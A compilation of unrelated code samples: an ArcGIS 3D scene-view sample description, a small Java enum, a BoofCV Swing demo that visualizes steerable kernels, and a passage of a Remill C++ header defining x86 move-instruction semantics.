Scene views are 3D representations of real-world areas and objects. Scene views are helpful for visualizing complex datasets where 3D relationships, topography, and elevation of elements are important factors.

## How to use the sample

When loaded, the sample will display a scene. Pan and zoom to explore the scene.

## How it works

1. Create a `Scene` object with the `BasemapImageryWithLabels` basemap.
2. Create an `ArcGISTiledElevationSource` object and add it to the scene's base surface.
3. Create a `SceneView` object to display the scene.
4. Set the scene to the scene view.

## Relevant API

* ArcGISTiledElevationSource
* Scene
* SceneView

## Tags

3D, basemap, elevation, scene, surface
Java
package no.dusken.momus.model.websocket; public enum Action { CREATE, UPDATE, DELETE }
Java
/* * Copyright (c) 2021, Peter Abeles. All Rights Reserved. * * This file is part of BoofCV (http://boofcv.org). * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package boofcv.demonstrations.imageprocessing; import boofcv.abst.distort.FDistort; import boofcv.alg.filter.kernel.GKernelMath; import boofcv.alg.filter.kernel.SteerableKernel; import boofcv.alg.misc.GImageStatistics; import boofcv.core.image.GeneralizedImageOps; import boofcv.gui.ListDisplayPanel; import boofcv.gui.SelectAlgorithmPanel; import boofcv.gui.image.VisualizeImageData; import boofcv.struct.convolve.Kernel2D; import boofcv.struct.image.ImageGray; import javax.swing.*; import java.awt.*; import java.awt.image.BufferedImage; import java.util.ArrayList; import java.util.List; /** * Visualizes steerable kernels. 
* * @author Peter Abeles */ public abstract class DisplaySteerableBase<T extends ImageGray<T>, K extends Kernel2D> extends SelectAlgorithmPanel { protected static int imageSize = 400; protected static int radius = 100; protected Class<T> imageType; protected Class<K> kernelType; ListDisplayPanel basisPanel = new ListDisplayPanel(); ListDisplayPanel steerPanel = new ListDisplayPanel(); T largeImg; List<DisplayGaussianKernelApp.DerivType> order = new ArrayList<>(); protected DisplaySteerableBase( Class<T> imageType, Class<K> kernelType ) { this.imageType = imageType; this.kernelType = kernelType; largeImg = GeneralizedImageOps.createSingleBand(imageType, imageSize, imageSize); addAlgorithm("Deriv X", new DisplayGaussianKernelApp.DerivType(1, 0)); addAlgorithm("Deriv XX", new DisplayGaussianKernelApp.DerivType(2, 0)); addAlgorithm("Deriv XXX", new DisplayGaussianKernelApp.DerivType(3, 0)); addAlgorithm("Deriv XXXX", new DisplayGaussianKernelApp.DerivType(4, 0)); addAlgorithm("Deriv XY", new DisplayGaussianKernelApp.DerivType(1, 1)); addAlgorithm("Deriv XXY", new DisplayGaussianKernelApp.DerivType(2, 1)); addAlgorithm("Deriv XYY", new DisplayGaussianKernelApp.DerivType(1, 2)); addAlgorithm("Deriv XXXY", new DisplayGaussianKernelApp.DerivType(3, 1)); addAlgorithm("Deriv XXYY", new DisplayGaussianKernelApp.DerivType(2, 2)); addAlgorithm("Deriv XYYY", new DisplayGaussianKernelApp.DerivType(1, 3)); JPanel content = new JPanel(new GridLayout(0, 2)); content.add(basisPanel); content.add(steerPanel); setMainGUI(content); } protected abstract SteerableKernel<K> createKernel( int orderX, int orderY ); @Override public void setActiveAlgorithm( String name, Object cookie ) { DisplayGaussianKernelApp.DerivType dt = (DisplayGaussianKernelApp.DerivType)cookie; // add basis SteerableKernel<K> steerable = createKernel(dt.orderX, dt.orderY); basisPanel.reset(); for (int i = 0; i < steerable.getBasisSize(); i++) { T smallImg = GKernelMath.convertToImage(steerable.getBasis(i)); new 
FDistort(smallImg, largeImg).scaleExt().interpNN().apply(); double maxValue = GImageStatistics.maxAbs(largeImg); BufferedImage out = VisualizeImageData.colorizeSign(largeImg, null, maxValue); basisPanel.addImage(out, "Basis " + i); } // add steered kernels steerPanel.reset(); for (int i = 0; i <= 20; i++) { double angle = Math.PI*i/20.0; K kernel = steerable.compute(angle); T smallImg = GKernelMath.convertToImage(kernel); new FDistort(smallImg, largeImg).scaleExt().interpNN().apply(); double maxValue = GImageStatistics.maxAbs(largeImg); BufferedImage out = VisualizeImageData.colorizeSign(largeImg, null, maxValue); steerPanel.addImage(out, String.format("%5d", (int)(180.0*angle/Math.PI))); } repaint(); } }
Java
/* * Copyright (c) 2017 Trail of Bits, Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ #pragma once namespace { template <typename D, typename S> DEF_SEM(MOV, D dst, const S src) { WriteZExt(dst, Read(src)); return memory; } template <typename D1, typename S1, typename D2, typename S2> DEF_SEM(XCHG, D1 dst, S1 dst_val, D2 src, S2 src_val) { auto old_dst = Read(dst_val); auto old_src = Read(src_val); WriteZExt(dst, old_src); WriteZExt(src, old_dst); return memory; } template <typename D, typename S> DEF_SEM(MOVBE16, D dst, const S src) { WriteZExt(dst, __builtin_bswap16(Read(src))); return memory; } template <typename D, typename S> DEF_SEM(MOVBE32, D dst, const S src) { WriteZExt(dst, __builtin_bswap32(Read(src))); return memory; } #if 64 == ADDRESS_SIZE_BITS template <typename D, typename S> DEF_SEM(MOVBE64, D dst, const S src) { Write(dst, __builtin_bswap64(Read(src))); return memory; } #endif template <typename D, typename S> DEF_SEM(MOVQ, D dst, S src) { UWriteV64(dst, UExtractV64(UReadV64(src), 0)); return memory; } template <typename D, typename S> DEF_SEM(MOVD, D dst, S src) { UWriteV32(dst, UExtractV32(UReadV32(src), 0)); return memory; } template <typename D, typename S> DEF_SEM(MOVxPS, D dst, S src) { FWriteV32(dst, FReadV32(src)); return memory; } template <typename D, typename S> DEF_SEM(MOVxPD, D dst, S src) { FWriteV64(dst, FReadV64(src)); return memory; } template <typename D, typename S> DEF_SEM(MOVDQx, D dst, S src) { UWriteV128(dst, UReadV128(src)); 
return memory; } template <typename D, typename S> DEF_SEM(MOVLPS, D dst, S src) { auto src_vec = FReadV32(src); auto low1 = FExtractV32(src_vec, 0); auto low2 = FExtractV32(src_vec, 1); FWriteV32(dst, FInsertV32(FInsertV32(FReadV32(dst), 0, low1), 1, low2)); return memory; } DEF_SEM(MOVLHPS, V128W dst, V128 src) { auto res = FReadV32(dst); auto src1 = FReadV32(src); res = FInsertV32(res, 2, FExtractV32(src1, 0)); res = FInsertV32(res, 3, FExtractV32(src1, 1)); FWriteV32(dst, res); return memory; } DEF_SEM(MOVHLPS, V128W dst, V128 src) { auto res = FReadV32(dst); auto src1 = FReadV32(src); res = FInsertV32(res, 0, FExtractV32(src1, 2)); res = FInsertV32(res, 1, FExtractV32(src1, 3)); FWriteV32(dst, res); return memory; } template <typename D, typename S> DEF_SEM(MOVLPD, D dst, S src) { FWriteV64(dst, FInsertV64(FReadV64(dst), 0, FExtractV64(FReadV64(src), 0))); return memory; } #if HAS_FEATURE_AVX DEF_SEM(VMOVLPS, VV128W dst, V128 src1, MV64 src2) { auto low_vec = FReadV32(src2); FWriteV32( dst, FInsertV32(FInsertV32(FReadV32(src1), 0, FExtractV32(low_vec, 0)), 1, FExtractV32(low_vec, 1))); return memory; } DEF_SEM(VMOVLPD, VV128W dst, V128 src1, MV64 src2) { FWriteV64(dst, FInsertV64(FReadV64(src1), 0, FExtractV64(FReadV64(src2), 0))); return memory; } DEF_SEM(VMOVLHPS, VV128W dst, V128 src1, V128 src2) { /* DEST[63:0] ← SRC1[63:0] */ /* DEST[127:64] ← SRC2[63:0] */ /* DEST[VLMAX-1:128] ← 0 */ auto src1_vec = FReadV32(src1); auto src2_vec = FReadV32(src2); float32v4_t temp_vec = {}; temp_vec = FInsertV32(temp_vec, 0, FExtractV32(src1_vec, 0)); temp_vec = FInsertV32(temp_vec, 1, FExtractV32(src1_vec, 1)); temp_vec = FInsertV32(temp_vec, 2, FExtractV32(src2_vec, 0)); temp_vec = FInsertV32(temp_vec, 3, FExtractV32(src2_vec, 1)); FWriteV32(dst, temp_vec); return memory; } DEF_SEM(VMOVHLPS, VV128W dst, V128 src1, V128 src2) { auto src1_vec = FReadV32(src1); auto src2_vec = FReadV32(src2); float32v4_t temp_vec = {}; temp_vec = FInsertV32(temp_vec, 0, 
FExtractV32(src2_vec, 2)); temp_vec = FInsertV32(temp_vec, 1, FExtractV32(src2_vec, 3)); temp_vec = FInsertV32(temp_vec, 2, FExtractV32(src1_vec, 2)); temp_vec = FInsertV32(temp_vec, 3, FExtractV32(src1_vec, 3)); FWriteV32(dst, temp_vec); return memory; } #endif // HAS_FEATURE_AVX } // namespace // Fused `CALL $0; POP reg` sequences. DEF_ISEL(CALL_POP_FUSED_32) = MOV<R32W, I32>; DEF_ISEL(CALL_POP_FUSED_64) = MOV<R64W, I64>; DEF_ISEL(MOV_GPR8_IMMb_C6r0) = MOV<R8W, I8>; DEF_ISEL(MOV_MEMb_IMMb) = MOV<M8W, I8>; DEF_ISEL_RnW_In(MOV_GPRv_IMMz, MOV); DEF_ISEL_MnW_In(MOV_MEMv_IMMz, MOV); DEF_ISEL(MOVBE_GPRv_MEMv_16) = MOVBE16<R16W, M16>; DEF_ISEL(MOVBE_GPRv_MEMv_32) = MOVBE32<R32W, M32>; IF_64BIT(DEF_ISEL(MOVBE_GPRv_MEMv_64) = MOVBE64<R64W, M64>;) DEF_ISEL(MOV_GPR8_GPR8_88) = MOV<R8W, R8>; DEF_ISEL(MOV_MEMb_GPR8) = MOV<M8W, R8>; DEF_ISEL_MnW_Rn(MOV_MEMv_GPRv, MOV); DEF_ISEL_RnW_Rn(MOV_GPRv_GPRv_89, MOV); DEF_ISEL_RnW_Rn(MOV_GPRv_GPRv_8B, MOV); DEF_ISEL(MOV_GPR8_MEMb) = MOV<R8W, M8>; DEF_ISEL(MOV_GPR8_GPR8_8A) = MOV<R8W, R8>; DEF_ISEL_RnW_Mn(MOV_GPRv_MEMv, MOV); DEF_ISEL_MnW_Rn(MOV_MEMv_GPRv_8B, MOV); DEF_ISEL(MOV_AL_MEMb) = MOV<R8W, M8>; DEF_ISEL_RnW_Mn(MOV_OrAX_MEMv, MOV); DEF_ISEL(MOV_MEMb_AL) = MOV<M8W, R8>; DEF_ISEL_MnW_Rn(MOV_MEMv_OrAX, MOV); DEF_ISEL(MOV_GPR8_IMMb_D0) = MOV<R8W, I8>; DEF_ISEL(MOV_GPR8_IMMb_B0) = MOV<R8W, I8>; // https://github.com/intelxed/xed/commit/906d25 DEF_ISEL_RnW_In(MOV_GPRv_IMMv, MOV); DEF_ISEL(MOVNTI_MEMd_GPR32) = MOV<M32W, R32>; IF_64BIT(DEF_ISEL(MOVNTI_MEMq_GPR64) = MOV<M64W, R64>;) DEF_ISEL(XCHG_MEMb_GPR8) = XCHG<M8W, M8, R8W, R8>; DEF_ISEL(XCHG_GPR8_GPR8) = XCHG<R8W, R8, R8W, R8>; DEF_ISEL_MnW_Mn_RnW_Rn(XCHG_MEMv_GPRv, XCHG); DEF_ISEL_RnW_Rn_RnW_Rn(XCHG_GPRv_GPRv, XCHG); DEF_ISEL_RnW_Rn_RnW_Rn(XCHG_GPRv_OrAX, XCHG); DEF_ISEL(MOVQ_MMXq_MEMq_0F6E) = MOVQ<V64W, MV64>; DEF_ISEL(MOVQ_MMXq_GPR64) = MOVQ<V64W, V64>; DEF_ISEL(MOVQ_MEMq_MMXq_0F7E) = MOVQ<V64W, V64>; DEF_ISEL(MOVQ_GPR64_MMXq) = MOVQ<V64W, V64>; DEF_ISEL(MOVQ_MMXq_MEMq_0F6F) = 
MOVQ<V64W, MV64>; DEF_ISEL(MOVQ_MMXq_MMXq_0F6F) = MOVQ<V64W, V64>; DEF_ISEL(MOVQ_MEMq_MMXq_0F7F) = MOVQ<MV64W, V64>; DEF_ISEL(MOVQ_MMXq_MMXq_0F7F) = MOVQ<V64W, V64>; DEF_ISEL(MOVQ_XMMdq_MEMq_0F6E) = MOVQ<V128W, MV64>; IF_64BIT(DEF_ISEL(MOVQ_XMMdq_GPR64) = MOVQ<V128W, V64>;) DEF_ISEL(MOVQ_MEMq_XMMq_0F7E) = MOVQ<MV64W, V128>; IF_64BIT(DEF_ISEL(MOVQ_GPR64_XMMq) = MOVQ<V64W, V128>;) DEF_ISEL(MOVQ_MEMq_XMMq_0FD6) = MOVQ<MV64W, V128>; DEF_ISEL(MOVQ_XMMdq_XMMq_0FD6) = MOVQ<V128W, V128>; DEF_ISEL(MOVQ_XMMdq_MEMq_0F7E) = MOVQ<V128W, MV64>; DEF_ISEL(MOVQ_XMMdq_XMMq_0F7E) = MOVQ<V128W, V128>; #if HAS_FEATURE_AVX DEF_ISEL(VMOVQ_XMMdq_MEMq_6E) = MOVQ<VV128W, MV64>; IF_64BIT(DEF_ISEL(VMOVQ_XMMdq_GPR64q) = MOVQ<VV128W, V64>;) DEF_ISEL(VMOVQ_MEMq_XMMq_7E) = MOVQ<MV64W, V128>; IF_64BIT(DEF_ISEL(VMOVQ_GPR64q_XMMq) = MOVQ<V64W, V128>;) DEF_ISEL(VMOVQ_XMMdq_MEMq_7E) = MOVQ<VV128W, MV64>; DEF_ISEL(VMOVQ_XMMdq_XMMq_7E) = MOVQ<VV128W, V128>; DEF_ISEL(VMOVQ_MEMq_XMMq_D6) = MOVQ<MV64W, V128>; DEF_ISEL(VMOVQ_XMMdq_XMMq_D6) = MOVQ<VV128W, V128>; # if HAS_FEATURE_AVX512 DEF_ISEL(VMOVQ_XMMu64_MEMu64_AVX512) = MOVQ<VV128W, MV64>; IF_64BIT(DEF_ISEL(VMOVQ_GPR64u64_XMMu64_AVX512) = MOVQ<V64W, V128>;) IF_64BIT(DEF_ISEL(VMOVQ_XMMu64_GPR64u64_AVX512) = MOVQ<VV128W, V64>;) DEF_ISEL(VMOVQ_XMMu64_XMMu64_AVX512) = MOVQ<VV128W, V128>; DEF_ISEL(VMOVQ_MEMu64_XMMu64_AVX512) = MOVQ<MV64W, V128>; # endif // HAS_FEATURE_AVX512 #endif // HAS_FEATURE_AVX DEF_ISEL(MOVD_MMXq_MEMd) = MOVD<V32W, MV32>; DEF_ISEL(MOVD_MMXq_GPR32) = MOVD<V32W, V32>; DEF_ISEL(MOVD_MEMd_MMXd) = MOVD<MV32W, V32>; DEF_ISEL(MOVD_GPR32_MMXd) = MOVD<V32W, V32>; DEF_ISEL(MOVD_XMMdq_MEMd) = MOVD<V128W, MV32>; DEF_ISEL(MOVD_XMMdq_GPR32) = MOVD<V128W, V32>; // Zero extends. 
DEF_ISEL(MOVD_MEMd_XMMd) = MOVD<MV32W, V128>; DEF_ISEL(MOVD_GPR32_XMMd) = MOVD<V32W, V128>; #if HAS_FEATURE_AVX DEF_ISEL(VMOVD_XMMdq_MEMd) = MOVD<VV128W, MV32>; DEF_ISEL(VMOVD_XMMdq_GPR32d) = MOVD<VV128W, V32>; DEF_ISEL(VMOVD_MEMd_XMMd) = MOVD<MV32W, V128>; DEF_ISEL(VMOVD_GPR32d_XMMd) = MOVD<V32W, V128>; # if HAS_FEATURE_AVX512 DEF_ISEL(VMOVD_XMMu32_MEMu32_AVX512) = MOVD<VV128W, MV32>; DEF_ISEL(VMOVD_XMMu32_GPR32u32_AVX512) = MOVD<VV128W, V32>; DEF_ISEL(VMOVD_MEMu32_XMMu32_AVX512) = MOVD<MV32W, V128>; DEF_ISEL(VMOVD_GPR32u32_XMMu32_AVX512) = MOVD<V32W, V128>; # endif // HAS_FEATURE_AVX512 #endif // HAS_FEATURE_AVX DEF_ISEL(MOVAPS_XMMps_MEMps) = MOVxPS<V128W, MV128>; DEF_ISEL(MOVAPS_XMMps_XMMps_0F28) = MOVxPS<V128W, V128>; DEF_ISEL(MOVAPS_MEMps_XMMps) = MOVxPS<MV128W, V128>; DEF_ISEL(MOVAPS_XMMps_XMMps_0F29) = MOVxPS<V128W, V128>; #if HAS_FEATURE_AVX DEF_ISEL(VMOVAPS_XMMdq_MEMdq) = MOVxPS<VV128W, MV128>; DEF_ISEL(VMOVAPS_XMMdq_XMMdq_28) = MOVxPS<VV128W, VV128>; DEF_ISEL(VMOVAPS_MEMdq_XMMdq) = MOVxPS<MV128W, VV128>; DEF_ISEL(VMOVAPS_XMMdq_XMMdq_29) = MOVxPS<VV128W, VV128>; DEF_ISEL(VMOVAPS_YMMqq_MEMqq) = MOVxPS<VV256W, MV256>; DEF_ISEL(VMOVAPS_YMMqq_YMMqq_28) = MOVxPS<VV256W, VV256>; DEF_ISEL(VMOVAPS_MEMqq_YMMqq) = MOVxPS<MV256W, VV256>; DEF_ISEL(VMOVAPS_YMMqq_YMMqq_29) = MOVxPS<VV256W, VV256>; # if HAS_FEATURE_AVX512 //4102 VMOVAPS VMOVAPS_ZMMf32_MASKmskw_ZMMf32_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: MASKOP_EVEX //4103 VMOVAPS VMOVAPS_ZMMf32_MASKmskw_MEMf32_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: AVX_REQUIRES_ALIGNMENT DISP8_FULLMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION REQUIRES_ALIGNMENT //4104 VMOVAPS VMOVAPS_ZMMf32_MASKmskw_ZMMf32_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: MASKOP_EVEX //4105 VMOVAPS VMOVAPS_MEMf32_MASKmskw_ZMMf32_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: AVX_REQUIRES_ALIGNMENT DISP8_FULLMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION REQUIRES_ALIGNMENT //4106 VMOVAPS VMOVAPS_XMMf32_MASKmskw_XMMf32_AVX512 DATAXFER 
AVX512EVEX AVX512F_128 ATTRIBUTES: MASKOP_EVEX //4107 VMOVAPS VMOVAPS_XMMf32_MASKmskw_MEMf32_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: AVX_REQUIRES_ALIGNMENT DISP8_FULLMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION REQUIRES_ALIGNMENT //4108 VMOVAPS VMOVAPS_XMMf32_MASKmskw_XMMf32_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: MASKOP_EVEX //4109 VMOVAPS VMOVAPS_MEMf32_MASKmskw_XMMf32_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: AVX_REQUIRES_ALIGNMENT DISP8_FULLMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION REQUIRES_ALIGNMENT //4110 VMOVAPS VMOVAPS_YMMf32_MASKmskw_YMMf32_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: MASKOP_EVEX //4111 VMOVAPS VMOVAPS_YMMf32_MASKmskw_MEMf32_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: AVX_REQUIRES_ALIGNMENT DISP8_FULLMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION REQUIRES_ALIGNMENT //4112 VMOVAPS VMOVAPS_YMMf32_MASKmskw_YMMf32_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: MASKOP_EVEX //4113 VMOVAPS VMOVAPS_MEMf32_MASKmskw_YMMf32_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: AVX_REQUIRES_ALIGNMENT DISP8_FULLMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION REQUIRES_ALIGNMENT # endif // HAS_FEATURE_AVX512 #endif // HAS_FEATURE_AVX DEF_ISEL(MOVNTPS_MEMdq_XMMps) = MOVxPS<MV128W, V128>; #if HAS_FEATURE_AVX DEF_ISEL(VMOVNTPS_MEMdq_XMMdq) = MOVxPS<MV128W, VV128>; DEF_ISEL(VMOVNTPS_MEMqq_YMMqq) = MOVxPS<MV256W, VV256>; # if HAS_FEATURE_AVX512 //6168 VMOVNTPS VMOVNTPS_MEMf32_ZMMf32_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: DISP8_FULLMEM NOTSX REQUIRES_ALIGNMENT //6169 VMOVNTPS VMOVNTPS_MEMf32_XMMf32_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: DISP8_FULLMEM NOTSX REQUIRES_ALIGNMENT //6170 VMOVNTPS VMOVNTPS_MEMf32_YMMf32_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: DISP8_FULLMEM NOTSX REQUIRES_ALIGNMENT # endif // HAS_FEATURE_AVX512 #endif // HAS_FEATURE_AVX DEF_ISEL(MOVUPS_XMMps_MEMps) = MOVxPS<V128W, MV128>; DEF_ISEL(MOVUPS_XMMps_XMMps_0F10) = MOVxPS<V128W, V128>; DEF_ISEL(MOVUPS_MEMps_XMMps) = MOVxPS<MV128W, 
V128>; DEF_ISEL(MOVUPS_XMMps_XMMps_0F11) = MOVxPS<V128W, V128>; #if HAS_FEATURE_AVX DEF_ISEL(VMOVUPS_XMMdq_MEMdq) = MOVxPS<VV128W, MV128>; DEF_ISEL(VMOVUPS_XMMdq_XMMdq_10) = MOVxPS<VV128W, VV128>; DEF_ISEL(VMOVUPS_MEMdq_XMMdq) = MOVxPS<MV128W, VV128>; DEF_ISEL(VMOVUPS_XMMdq_XMMdq_11) = MOVxPS<VV128W, VV128>; DEF_ISEL(VMOVUPS_YMMqq_MEMqq) = MOVxPS<VV256W, MV256>; DEF_ISEL(VMOVUPS_YMMqq_YMMqq_10) = MOVxPS<VV256W, VV256>; DEF_ISEL(VMOVUPS_MEMqq_YMMqq) = MOVxPS<MV256W, VV256>; DEF_ISEL(VMOVUPS_YMMqq_YMMqq_11) = MOVxPS<VV256W, VV256>; # if HAS_FEATURE_AVX512 //4954 VMOVUPS VMOVUPS_ZMMf32_MASKmskw_ZMMf32_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: MASKOP_EVEX //4955 VMOVUPS VMOVUPS_ZMMf32_MASKmskw_MEMf32_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: DISP8_FULLMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION //4956 VMOVUPS VMOVUPS_ZMMf32_MASKmskw_ZMMf32_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: MASKOP_EVEX //4957 VMOVUPS VMOVUPS_MEMf32_MASKmskw_ZMMf32_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: DISP8_FULLMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION //4958 VMOVUPS VMOVUPS_XMMf32_MASKmskw_XMMf32_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: MASKOP_EVEX //4959 VMOVUPS VMOVUPS_XMMf32_MASKmskw_MEMf32_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: DISP8_FULLMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION //4960 VMOVUPS VMOVUPS_XMMf32_MASKmskw_XMMf32_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: MASKOP_EVEX //4961 VMOVUPS VMOVUPS_MEMf32_MASKmskw_XMMf32_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: DISP8_FULLMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION //4962 VMOVUPS VMOVUPS_YMMf32_MASKmskw_YMMf32_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: MASKOP_EVEX //4963 VMOVUPS VMOVUPS_YMMf32_MASKmskw_MEMf32_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: DISP8_FULLMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION //4964 VMOVUPS VMOVUPS_YMMf32_MASKmskw_YMMf32_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: MASKOP_EVEX //4965 VMOVUPS 
VMOVUPS_MEMf32_MASKmskw_YMMf32_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: DISP8_FULLMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION # endif // HAS_FEATURE_AVX512 #endif // HAS_FEATURE_AVX DEF_ISEL(MOVAPD_XMMpd_MEMpd) = MOVxPD<V128W, MV128>; DEF_ISEL(MOVAPD_XMMpd_XMMpd_0F28) = MOVxPD<V128W, V128>; DEF_ISEL(MOVAPD_MEMpd_XMMpd) = MOVxPD<MV128W, V128>; DEF_ISEL(MOVAPD_XMMpd_XMMpd_0F29) = MOVxPD<V128W, V128>; #if HAS_FEATURE_AVX DEF_ISEL(VMOVAPD_XMMdq_MEMdq) = MOVxPD<VV128W, MV128>; DEF_ISEL(VMOVAPD_XMMdq_XMMdq_28) = MOVxPD<VV128W, VV128>; DEF_ISEL(VMOVAPD_MEMdq_XMMdq) = MOVxPD<MV128W, VV128>; DEF_ISEL(VMOVAPD_XMMdq_XMMdq_29) = MOVxPD<VV128W, VV128>; DEF_ISEL(VMOVAPD_YMMqq_MEMqq) = MOVxPD<VV256W, MV256>; DEF_ISEL(VMOVAPD_YMMqq_YMMqq_28) = MOVxPD<VV256W, VV256>; DEF_ISEL(VMOVAPD_MEMqq_YMMqq) = MOVxPD<MV256W, VV256>; DEF_ISEL(VMOVAPD_YMMqq_YMMqq_29) = MOVxPD<VV256W, VV256>; # if HAS_FEATURE_AVX512 //5585 VMOVAPD VMOVAPD_ZMMf64_MASKmskw_ZMMf64_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: MASKOP_EVEX //5586 VMOVAPD VMOVAPD_ZMMf64_MASKmskw_MEMf64_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: AVX_REQUIRES_ALIGNMENT DISP8_FULLMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION REQUIRES_ALIGNMENT //5587 VMOVAPD VMOVAPD_ZMMf64_MASKmskw_ZMMf64_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: MASKOP_EVEX //5588 VMOVAPD VMOVAPD_MEMf64_MASKmskw_ZMMf64_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: AVX_REQUIRES_ALIGNMENT DISP8_FULLMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION REQUIRES_ALIGNMENT //5589 VMOVAPD VMOVAPD_XMMf64_MASKmskw_XMMf64_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: MASKOP_EVEX //5590 VMOVAPD VMOVAPD_XMMf64_MASKmskw_MEMf64_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: AVX_REQUIRES_ALIGNMENT DISP8_FULLMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION REQUIRES_ALIGNMENT //5591 VMOVAPD VMOVAPD_XMMf64_MASKmskw_XMMf64_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: MASKOP_EVEX //5592 VMOVAPD VMOVAPD_MEMf64_MASKmskw_XMMf64_AVX512 DATAXFER AVX512EVEX AVX512F_128 
ATTRIBUTES: AVX_REQUIRES_ALIGNMENT DISP8_FULLMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION REQUIRES_ALIGNMENT //5593 VMOVAPD VMOVAPD_YMMf64_MASKmskw_YMMf64_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: MASKOP_EVEX //5594 VMOVAPD VMOVAPD_YMMf64_MASKmskw_MEMf64_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: AVX_REQUIRES_ALIGNMENT DISP8_FULLMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION REQUIRES_ALIGNMENT //5595 VMOVAPD VMOVAPD_YMMf64_MASKmskw_YMMf64_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: MASKOP_EVEX //5596 VMOVAPD VMOVAPD_MEMf64_MASKmskw_YMMf64_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: AVX_REQUIRES_ALIGNMENT DISP8_FULLMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION REQUIRES_ALIGNMENT # endif // HAS_FEATURE_AVX512 #endif // HAS_FEATURE_AVX DEF_ISEL(MOVNTPD_MEMdq_XMMpd) = MOVxPD<MV128W, V128>; #if HAS_FEATURE_AVX DEF_ISEL(VMOVNTPD_MEMdq_XMMdq) = MOVxPD<MV128W, VV128>; DEF_ISEL(VMOVNTPD_MEMqq_YMMqq) = MOVxPD<MV256W, VV256>; # if HAS_FEATURE_AVX512 //6088 VMOVNTPD VMOVNTPD_MEMf64_ZMMf64_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: AVX_REQUIRES_ALIGNMENT DISP8_FULLMEM NOTSX REQUIRES_ALIGNMENT //6089 VMOVNTPD VMOVNTPD_MEMf64_XMMf64_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: AVX_REQUIRES_ALIGNMENT DISP8_FULLMEM NOTSX REQUIRES_ALIGNMENT //6090 VMOVNTPD VMOVNTPD_MEMf64_YMMf64_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: AVX_REQUIRES_ALIGNMENT DISP8_FULLMEM NOTSX REQUIRES_ALIGNMENT # endif // HAS_FEATURE_AVX512 #endif // HAS_FEATURE_AVX DEF_ISEL(MOVUPD_XMMpd_MEMpd) = MOVxPD<V128W, MV128>; DEF_ISEL(MOVUPD_XMMpd_XMMpd_0F10) = MOVxPD<V128W, V128>; 